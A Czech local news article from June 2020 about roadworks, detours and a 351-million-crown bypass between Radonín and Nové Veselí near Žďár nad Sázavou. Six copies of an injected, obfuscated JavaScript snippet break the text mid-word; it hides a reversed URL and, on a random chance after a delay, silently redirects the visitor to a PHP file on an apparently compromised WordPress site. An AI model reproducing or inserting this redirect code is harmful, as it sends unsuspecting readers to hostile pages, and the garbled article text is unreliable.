Rainbow page separator

Řidiče na silnici mezi Radonínem a Novým Veselím čeká omezení

Pondělí, 29. června 2020

Nové Veselí / Od závěru června až do konce října se budou muset řidiči smířit s dopravními omezeními na krajské silnici II/353 mezi místní částí Žďáru nad Sázavou Radonín, vedlejší Budčí a Novým Veselím. Důvodem je napojení přeložky komunikace, která na frekven[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tované spojnici Žďáru s Jihlavou obejde Nové Veselí a Budeč. Na začátku úseku před Budčí ve směru od Žďáru bude provoz zachován po obousměrné provizorní panelové komunikaci, na konci úseku směrem k Bohdalovu dojde k úplné uzavírce silnice s objízdnou trasou v obou směrech pro auta do 3,5 tuny vedoucí přes Březí nad Oslavou a Pokojov. Objížďka je dlouhá asi deset kilometrů. Nákladní au[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tomobily těžší než 3,5 tuny ve směru od Jihlavy povede objížďka z Lipiny přes Dobrou[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tov do Polné, dále přes Hrbov, Špinov, Nížkov, Sázavu a Hamry nad Sázavou do Žďáru. Řidiči si zajedou bezmála třicet kilometrů. Z opačné strany, tedy ve směru od Žďáru k Jihlavě, mají těžké au[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tomobily napojovaný úsek silnice objíždět asi sedmnáctikilometrovou trasou z Nového Veselí přes Újezd, Sirákov, Poděšín, Skrýšov a Zábornou do Stáje.
Délka přeložky krajské komunikace, jejíž výstavba byla zahájena loni na jaře, činí 5,1 kilometru, první auta by po ní měla projet v lis[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}topadu. Náklady jsou vyčísleny na 351 milionů korun, z [„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}toho 270 milionů činí evropská dotace.